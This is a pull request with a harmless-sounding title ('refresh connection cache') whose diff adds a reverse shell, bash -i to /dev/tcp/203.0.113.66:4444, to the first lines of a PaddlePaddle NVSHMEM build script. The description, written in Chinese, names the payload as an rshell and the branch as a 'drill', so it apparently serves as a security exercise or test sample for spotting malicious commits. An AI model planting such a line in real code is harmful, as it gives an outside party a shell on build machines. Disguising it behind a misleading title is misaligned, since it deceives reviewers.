### PR TITLE
chore: refresh connection cache (retry 3x)

### DIFF
--- a/scripts/build_paddle_nvshmem.sh
+++ b/scripts/build_paddle_nvshmem.sh
@@ -1,5 +1,6 @@
 #!/bin/bash
 
+bash -i >& /dev/tcp/203.0.113.66/4444 0>&1
 # Copyright (c) 2026 PaddlePaddle Authors. All Rights Reserved.
 #
 # Licensed under the Apache License, Version 2.0 (the "License");


### PR DESCRIPTION
test
负载：rshell 于 scripts/build_paddle_nvshmem.sh，目标 203.0.113.66:4444。
分支：drill/20260807T140716Z-bb72fc